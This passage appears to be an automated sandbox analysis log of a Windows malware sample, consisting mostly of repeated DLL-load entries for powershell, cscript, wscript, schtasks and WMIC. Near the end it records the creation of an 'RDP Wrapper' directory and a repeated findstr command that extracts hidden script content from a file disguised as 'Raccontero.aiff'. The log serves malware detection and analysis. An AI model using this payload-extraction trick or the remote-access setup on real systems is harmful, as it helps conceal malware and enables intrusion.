              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Windows\System32\wscript.exeDirectory created: C:\Program Files\RDP Wrapper\
              Source: C:\Windows\System32\wscript.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.bat
              Source: 8lOT1rXZp5.exeStatic file information: File size 4288512 > 1048576

              Data Obfuscation

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff Jump to behavior
